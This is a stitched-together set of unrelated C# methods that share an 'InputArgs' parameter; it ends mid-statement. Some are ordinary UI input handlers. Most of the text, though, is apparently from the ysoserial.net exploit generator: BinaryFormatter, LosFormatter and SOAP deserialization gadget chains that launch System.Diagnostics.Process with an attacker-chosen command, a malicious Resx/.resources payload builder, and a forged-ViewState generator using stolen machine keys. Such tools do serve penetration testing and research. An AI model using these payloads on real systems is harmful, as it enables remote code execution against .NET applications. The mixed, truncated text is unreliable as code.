public override bool ProcessEvent(InputArgs args) { if (_debug != null && _debug.ProcessEvent(args)) return true; return base.ProcessEvent(args); }
public bool ProcessEvent(InputArgs args) { var keyInputArgs = args as KeyInputArgs; if (keyInputArgs != null) { if (!keyInputArgs.Pressed) return false; return KeyPressed(keyInputArgs.Key, null); } var textInputArgs = args as TextInputArgs; if (textInputArgs != null) { return KeyPressed(Keyboard.Key.Unknown, textInputArgs.Text); } var mouseButtonArgs = args as MouseButtonInputArgs; if (mouseButtonArgs != null) { if (mouseButtonArgs.Pressed) RemoveFocus(); var mousePos = ConvertCoords(mouseButtonArgs.Position); return MousePressed(mousePos.X, mousePos.Y, mouseButtonArgs.Button, mouseButtonArgs.Pressed); } var mouseMoveArgs = args as MouseMoveInputArgs; if (mouseMoveArgs != null) { var mousePos = ConvertCoords(mouseMoveArgs.Position); MouseMoved(mousePos.X, mousePos.Y); } var mouseWheelArgs = args as MouseWheelInputArgs; if (mouseWheelArgs != null) { var mousePos = ConvertCoords(mouseWheelArgs.Position); return MouseWheelMoved(mousePos.X, mousePos.Y, mouseWheelArgs.Delta); } return false; }
internal bool ProcessInput(InputArgs args) { if (MouseMove != null && args is MouseMoveInputArgs) { var eArgs = (MouseMoveInputArgs)args; MouseMove(eArgs); return false; } if (args is KeyInputArgs) { var eArgs = (KeyInputArgs)args; KeyEvent e; if (Key.TryGetValue(eArgs.Key, out e)) return e(eArgs); } else if (Text != null && args is TextInputArgs) { var eArgs = (TextInputArgs)args; return Text(eArgs); } else if (args is MouseButtonInputArgs) { var eArgs = (MouseButtonInputArgs)args; MouseButtonEvent e; if (MouseButton.TryGetValue(eArgs.Button, out e)) return e(eArgs); } else if (MouseWheel != null && args is MouseWheelInputArgs) { var eArgs = (MouseWheelInputArgs)args; return MouseWheel(eArgs); } return false; }
/// <inheritdoc/> public void LeftDown(InputArgs args) => CurrentTool.LeftDown(args);
/// <inheritdoc/> public void RightUp(InputArgs args) => _editor?.CurrentTool?.RightUp(args);
public override object Generate(string formatter, InputArgs inputArgs) { if (inputArgs.Minify && inputArgs.UseSimpleType && (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("LosFormatter", StringComparison.OrdinalIgnoreCase))) { // This is to provide even a smaller payload inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; string tcd_json_minified = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 2, 'assemblyString': 'System' }},{'Id': 3, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 1, 'name': 'System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]', 'numMembers': 4, 'memberNames':['Count','Comparer','Version','Items'], 'binaryTypeEnumA':[0,1,0,1], 'typeInformationA': null, 'typeInformationB':[8,null,8,null], 'memberAssemIds':[0,0,0,0], 'assemId': 2 }},{'Id': 4, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 2 }},{'Id': 5, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 3 }},{'Id': 6, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 7, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 4 }},{'Id': 8, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 3, 'name': 'System.Collections.Generic.ComparisonComparer`1[[System.String]]', 'numMembers': 1, 'memberNames':['_comparison'], 'binaryTypeEnumA':[1], 'typeInformationA': null, 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 0 }},{'Id': 9, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 5 }},{'Id': 10, 'TypeName': 'ArraySingleString', 'Data': { '$type': 'BinaryArray', 'objectId': 4, 'rank': 0, 'lengthA':[2], 'lowerBoundA': null, 'binaryTypeEnum': 0, 'typeInformation': null, 'assemId': 0, 'binaryHeaderEnum': 17, 'binaryArrayTypeEnum': 0 }},{'Id': 11, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 6, 'value': '" + inputArgs.CmdArguments + @"' }},{'Id': 12, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 7, 'value': '" + inputArgs.CmdFileName + @"' }},{'Id': 13, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 5, 'name': 'System.DelegateSerializationHolder', 'numMembers': 3, 'memberNames':['Delegate','','x'], 'binaryTypeEnumA':[1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null], 'memberAssemIds':[0,0,0], 'assemId': 0 }},{'Id': 14, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 8 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 17, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 8, 'name': 'System.DelegateSerializationHolder+DelegateEntry', 'numMembers': 7, 'memberNames':['type','assembly','','targetTypeAssembly','targetTypeName','methodName','delegateEntry'], 'binaryTypeEnumA':[1,1,1,1,1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,null,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 18, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 11, 'value': 'System.Func`3[[System.String],[System.String],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]' }},{'Id': 19, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 12, 'value': 'mscorlib' }},{'Id': 20, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 21, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 13, 'value': 'System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089' }},{'Id': 22, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 14, 'value': 'System.Diagnostics.Process' }},{'Id': 23, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 15, 'value': 'Start' }},{'Id': 24, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 16 }},{'Id': 25, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 9, 'name': 'x', 'numMembers': 7, 'memberNames':['','','','','','',''], 'binaryTypeEnumA':[1,1,1,1,1,0,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,8,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 31, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 33, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 10, 'mapId': 9 }},{'Id': 34, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 22, 'value': 'Compare' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 36, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 24, 'value': 'System.String' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 39, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 40, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 41, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 16, 'mapId': 8 }},{'Id': 42, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 27, 'value': 'System.Comparison`1[[System.String]]' }},{'Id': 43, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 44, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 45, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 46, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 24 }},{'Id': 47, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 22 }},{'Id': 49, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]"; MemoryStream ms_bf = AdvancedBinaryFormatterParser.JsonToStream(tcd_json_minified); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)) { //BinaryFormatter if (inputArgs.Test) { try { ms_bf.Position = 0; SerializersHelper.BinaryFormatter_deserialize(ms_bf); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(ms_bf.ToArray()); } else { // LosFormatter MemoryStream ms_lf = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms_bf); if (inputArgs.Test) { try { ms_bf.Position = 0; SerializersHelper.LosFormatter_deserialize(ms_lf.ToArray()); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(ms_lf.ToArray()); } } else { return(Serialize(TypeConfuseDelegateGadget(inputArgs), formatter, inputArgs)); } }
public override object Generate(string formatter, InputArgs inputArgs) { PayloadClass payload = new PayloadClass(variant_number); return(Serialize(payload, formatter, inputArgs)); }
private async Task <ImmutableDictionary <string, object> > SerializeInputArgsAsync(string ctx, InputArgs args, bool keepResources, bool keepOutputValues) { if (_excessiveDebugOutput) { Log.Debug($"Serialize property[{ctx}]: Recursing into ResourceArgs"); } var dictionary = await args.ToDictionaryAsync().ConfigureAwait(false); return(await SerializeDictionaryAsync(ctx, dictionary, keepResources, keepOutputValues).ConfigureAwait(false)); }
public override object Generate(string formatter, InputArgs inputArgs) { IGenerator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { string payload_bf_json = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 1, 'name': 'System.Security.Claims.ClaimsIdentity', 'numMembers': 1, 'memberNames':['m_serializedClaims'], 'binaryTypeEnumA':[1], 'typeInformationA':[null], 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 0 }},{'Id': 10, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 5, 'value': '" + b64encoded + @"' }},{'Id': 11, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]"; MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(payload_bf_json); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)) { if (inputArgs.Test) { try { ms.Position = 0; System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter(); bf.Deserialize(ms); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(ms.ToArray()); } else { // it is LosFormatter byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms.ToArray()); MemoryStream ms2 = new MemoryStream(lfSerializedObj); ms2.Position = 0; if (inputArgs.Test) { try { System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter(); lf.Deserialize(ms2); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(lfSerializedObj); } } else if (formatter.ToLower().Equals("soapformatter")) { string payload = ""; payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:ClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Claims""> <m_serializedClaims id=""ref-5"">{b64encoded}</m_serializedClaims> </a1:ClaimsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
// Handles the input for the gui manager public void handleInput(InputArgs args) { // Variables Control ctrl; for(int i= 0; i< openedSets.size; i++) { if(sets.get(openedSets.items[i], out ctrl)) ctrl.handleInput(ref args); } }
public abstract void EndDown(InputArgs args);
public abstract void BeginUp(InputArgs args);
public abstract void BeginDown(InputArgs args);
public abstract void Move(InputArgs args);
public abstract void EndUp(InputArgs args);
public static string GetPayload(string mode, string file, InputArgs inputArgs) { String mtype = ""; String payloadValue = ""; string payload = @"<root> <xsd:schema id=""root"" xmlns="""" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:msdata=""urn:schemas-microsoft-com:xml-msdata""> <xsd:import namespace=""http://www.w3.org/XML/1998/namespace"" /> <xsd:element name=""root"" msdata:IsDataSet=""true""> <xsd:complexType> <xsd:choice maxOccurs=""unbounded""> <xsd:element name=""metadata""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" /> </xsd:sequence> <xsd:attribute name=""name"" use=""required"" type=""xsd:string"" /> <xsd:attribute name=""type"" type=""xsd:string"" /> <xsd:attribute name=""mimetype"" type=""xsd:string"" /> <xsd:attribute ref=""xml:space"" /> </xsd:complexType> </xsd:element> <xsd:element name=""assembly""> <xsd:complexType> <xsd:attribute name=""alias"" type=""xsd:string"" /> <xsd:attribute name=""name"" type=""xsd:string"" /> </xsd:complexType> </xsd:element> <xsd:element name=""data""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""1"" /> <xsd:element name=""comment"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""2"" /> </xsd:sequence> <xsd:attribute name=""name"" type=""xsd:string"" use=""required"" msdata:Ordinal=""1"" /> <xsd:attribute name=""type"" type=""xsd:string"" msdata:Ordinal=""3"" /> <xsd:attribute name=""mimetype"" type=""xsd:string"" msdata:Ordinal=""4"" /> <xsd:attribute ref=""xml:space"" /> </xsd:complexType> </xsd:element> <xsd:element name=""resheader""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""1"" /> </xsd:sequence> <xsd:attribute name=""name"" type=""xsd:string"" use=""required"" /> </xsd:complexType> </xsd:element> </xsd:choice> </xsd:complexType> </xsd:element> </xsd:schema> <resheader name=""resmimetype""> <value>text/microsoft-resx</value> </resheader> <resheader name=""version""> <value>2.0</value> </resheader> <resheader name=""reader""> <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <resheader name=""writer""> <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <assembly alias=""System.Windows.Forms"" name=""System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /> <data name=""x"" {0}> <value>{1}</value> </data> </root>"; switch (mode.ToLower()) { case "indirect_resx_file": if (!String.IsNullOrEmpty(file) && !String.IsNullOrWhiteSpace(file)) { mtype = @"type=""System.Resources.ResXFileRef"""; payloadValue = file + "; System.Resources.ResXResourceSet, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"; } break; case "binaryformatter": if (!String.IsNullOrEmpty(inputArgs.CmdFullString) && !String.IsNullOrWhiteSpace(inputArgs.CmdFullString)) { mtype = @"mimetype=""application/x-microsoft.net.object.binary.base64"""; byte[] osf = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); payloadValue = Convert.ToBase64String(osf); } break; case "soapformatter": mtype = @"mimetype=""application/x-microsoft.net.object.soap.base64"""; if (!String.IsNullOrEmpty(inputArgs.CmdFullString) && !String.IsNullOrWhiteSpace(inputArgs.CmdFullString)) { byte[] osf = (byte[])new ActivitySurrogateSelectorFromFileGenerator().GenerateWithNoTest("SoapFormatter", inputArgs); payloadValue = Convert.ToBase64String(osf); } else { byte[] osf = (byte[])new ActivitySurrogateSelectorGenerator().GenerateWithNoTest("SoapFormatter", inputArgs); payloadValue = Convert.ToBase64String(osf); } break; } if (String.IsNullOrEmpty(payloadValue)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p Resx --help' for more information."); System.Environment.Exit(-1); } payload = String.Format(payload, mtype, payloadValue); if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } return(payload); }
public static string GetPayload(string mode, InputArgs inputArgs) { return(GetPayload(mode, "", inputArgs)); }
void Input_Event(object sender, InputArgs e) { if (ShowManager) { foreach (KeyEvent evt in e.args) { if (LastWindowMouseEnter != null) LastWindowMouseEnter.KeyDown(evt); } } }
private static void DispatchEvent(InputArgs args) { if (State == null) return; State.ProcessEvent(args); }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); ShowExamples(); System.Environment.Exit(-1); } if (showExamples) { Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); ShowExamples(); System.Environment.Exit(-1); } if (String.IsNullOrEmpty(command) && !dryRun) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); ShowExamples(); System.Environment.Exit(-1); } var types = AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes()); // Populate list of available gadgets var generatorTypes = types.Where(p => typeof(Generator).IsAssignableFrom(p) && !p.IsInterface); var generators = generatorTypes.Select(x => x.Name.Replace("Generator", "")).ToList(); uint parsedViewstateGeneratorIdentifier = 0; if (!String.IsNullOrEmpty(viewstateGenerator)) { // Converting "__VIEWSTATEGENERATOR" from HEX to INT if (UInt32.TryParse(viewstateGenerator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out parsedViewstateGeneratorIdentifier)) { // A valid "__VIEWSTATEGENERATOR" was provided! isLegacy = true; } else { Console.WriteLine("Invalid generator parameter. It needs to be in Hex format. Example: 955733D9"); System.Environment.Exit(-1); } } if (dryRun) { if (isDebug) { Console.WriteLine("dryRun mode, using the minimum payload without any exploit"); } payloadString = dryRunViewStateString; } else if (!String.IsNullOrEmpty(unsignedPayload)) { payloadString = unsignedPayload; } else { if (!generators.Contains(gadget)) { Console.WriteLine("Gadget not supported."); System.Environment.Exit(-1); } // Instantiate Payload Generator Generator generator = null; try { var container = Activator.CreateInstance(null, "ysoserial.Generators." + gadget + "Generator"); generator = (Generator)container.Unwrap(); } catch { Console.WriteLine("Gadget not supported!"); System.Environment.Exit(-1); } // Check Generator supports specified formatter if (generator.IsSupported(formatter)) { payloadString = System.Text.Encoding.ASCII.GetString((byte[])generator.GenerateWithNoTest(formatter, inputArgs)); } else { Console.WriteLine("LosFormatter not supported."); System.Environment.Exit(-1); } } if (isDebug) { if (viewStateUserKey != null) { if (viewStateUserKey.Equals("")) { Console.WriteLine("viewStateUserKey is EMPTY not NULL. It will be used in MAC calculation"); } } } byte[] payload = System.Convert.FromBase64String(payloadString); // we are settign the given machineKey parameters dynamically in this application to make the process easier // thanks to stackoverflow #18446385 for the tips! object[] emptyArray = new object[] { }; var machineKeySectionType = systemWebAsm.GetType("System.Web.Configuration.MachineKeySection"); var getApplicationConfigMethod = machineKeySectionType.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic); var config = (MachineKeySection)getApplicationConfigMethod.Invoke(null, emptyArray); var section = (MachineKeySection)ConfigurationManager.GetSection("system.web/machinekey"); //interesting var readOnlyField = typeof(ConfigurationElement).GetField("_bReadOnly", BindingFlags.Instance | BindingFlags.NonPublic); readOnlyField.SetValue(config, false); // we don't really need the encryption/decyption keys to create a valid legacy viewstate but this is used when isEncrypted=true if (!String.IsNullOrEmpty(decryptionKey) && (!isLegacy || (isLegacy && isEncrypted))) { if (isDebug) { Console.WriteLine("Encryption is on!"); } config.Decryption = decryptionAlg; config.DecryptionKey = decryptionKey; } if (validationAlg.ToUpper().Equals("3DES")) { // If validationAlg is 3DES, modify it to TripleDES in order for Enum.Parse to work. validationAlg = "TripleDES"; } config.Validation = (MachineKeyValidation)Enum.Parse(typeof(MachineKeyValidation), validationAlg); config.ValidationKey = validationKey; readOnlyField.SetValue(config, true); object finalPayload; if (isLegacy) { finalPayload = generateViewStateLegacy_2_to_4(targetPagePath, parsedViewstateGeneratorIdentifier, IISAppInPathOrVirtualDir, isEncrypted, viewStateUserKey, payload); } else { finalPayload = generateViewState_4dot5(targetPagePath, IISAppInPathOrVirtualDir, viewStateUserKey, payload); } return(finalPayload); }
public static string GetPayload(string mode, string file, InputArgs inputArgs) { String mtype = ""; String payloadValue = ""; string payload = @"<root> <xsd:schema id=""root"" xmlns="""" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:msdata=""urn:schemas-microsoft-com:xml-msdata""> <xsd:import namespace=""http://www.w3.org/XML/1998/namespace"" /> <xsd:element name=""root"" msdata:IsDataSet=""true""> <xsd:complexType> <xsd:choice maxOccurs=""unbounded""> <xsd:element name=""metadata""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" /> </xsd:sequence> <xsd:attribute name=""name"" use=""required"" type=""xsd:string"" /> <xsd:attribute name=""type"" type=""xsd:string"" /> <xsd:attribute name=""mimetype"" type=""xsd:string"" /> <xsd:attribute ref=""xml:space"" /> </xsd:complexType> </xsd:element> <xsd:element name=""assembly""> <xsd:complexType> <xsd:attribute name=""alias"" type=""xsd:string"" /> <xsd:attribute name=""name"" type=""xsd:string"" /> </xsd:complexType> </xsd:element> <xsd:element name=""data""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""1"" /> <xsd:element name=""comment"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""2"" /> </xsd:sequence> <xsd:attribute name=""name"" type=""xsd:string"" use=""required"" msdata:Ordinal=""1"" /> <xsd:attribute name=""type"" type=""xsd:string"" msdata:Ordinal=""3"" /> <xsd:attribute name=""mimetype"" type=""xsd:string"" msdata:Ordinal=""4"" /> <xsd:attribute ref=""xml:space"" /> </xsd:complexType> </xsd:element> <xsd:element name=""resheader""> <xsd:complexType> <xsd:sequence> <xsd:element name=""value"" type=""xsd:string"" minOccurs=""0"" msdata:Ordinal=""1"" /> </xsd:sequence> <xsd:attribute name=""name"" type=""xsd:string"" use=""required"" /> </xsd:complexType> </xsd:element> </xsd:choice> </xsd:complexType> </xsd:element> </xsd:schema> <resheader name=""resmimetype""> <value>text/microsoft-resx</value> </resheader> <resheader name=""version""> <value>2.0</value> </resheader> <resheader name=""reader""> <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <resheader name=""writer""> <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <assembly alias=""System.Windows.Forms"" name=""System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /> <data name=""x"" {0}> <value>{1}</value> </data> </root>"; switch (mode.ToLower()) { case "indirect_resx_file": if (!String.IsNullOrEmpty(file) && !String.IsNullOrWhiteSpace(file)) { mtype = @"type=""System.Resources.ResXFileRef"""; payloadValue = file + "; System.Resources.ResXResourceSet, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"; } break; case "binaryformatter": case "compileddotresources": if (!String.IsNullOrWhiteSpace(inputArgs.CmdFullString)) { var types = AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes()); var generatorTypes = types.Where(p => typeof(IGenerator).IsAssignableFrom(p) && !p.IsInterface && !p.AssemblyQualifiedName.Contains("Helpers.TestingArena")); var generators = generatorTypes.Select(x => x.Name.Replace("Generator", "")).ToList().OrderBy(s => s, StringComparer.OrdinalIgnoreCase); if (!generators.Contains(gadget_name, StringComparer.CurrentCultureIgnoreCase)) { Console.WriteLine("Gadget not supported. Supported gadgets are: " + string.Join(" , ", generators.OrderBy(s => s, StringComparer.OrdinalIgnoreCase))); System.Environment.Exit(-1); } string formatter_name = "binaryformatter"; // this is what we need here // Instantiate Payload Generator IGenerator generator = null; try { gadget_name = generators.Where(p => String.Equals(p, gadget_name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault(); var container = Activator.CreateInstance(null, "ysoserial.Generators." + gadget_name + "Generator"); generator = (IGenerator)container.Unwrap(); } catch { Console.WriteLine("Gadget not supported!"); System.Environment.Exit(-1); } // Check Generator supports specified formatter if (generator.IsSupported(formatter_name)) { byte[] bfPayload = (byte[])generator.GenerateWithInit(formatter_name, inputArgs); if (mode.ToLower() == "binaryformatter") { mtype = @"mimetype=""application/x-microsoft.net.object.binary.base64"""; payloadValue = Convert.ToBase64String(bfPayload); } else { string header_AxHostStateGadget = @"zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAQAAAHpTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUsIFN5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OVBBRFCCIAusAAAAAIsBAABSQQBjAHQAaQB2AGkAdAB5AFMAdQByAHIAbwBnAGEAdABlAFMAZQBsAGUAYwB0AG8AcgBGAHIAbwBtAEYAaQBsAGUAXwBQAGEAeQBsAG8AYQBkAAAAAABA"; using (BinaryWriter binWriter = new BinaryWriter(File.Open(outputfile, FileMode.Create))) { // Write header of the resources file binWriter.Write(Convert.FromBase64String(header_AxHostStateGadget)); // Write body of the resources file (we call it body here but not a body in practice) binWriter.Write(bfPayload); } payloadValue = "The Resources output file has been written: " + outputfile; payload = "The Resources output file has been written: " + outputfile; } } else { Console.WriteLine("Formatter not supported. Supported formatters are: " + string.Join(" , ", generator.SupportedFormatters().OrderBy(s => s, StringComparer.OrdinalIgnoreCase))); System.Environment.Exit(-1); } } break; case "soapformatter": mtype = @"mimetype=""text/microsoft-urt/soap-serialized/base64"""; if 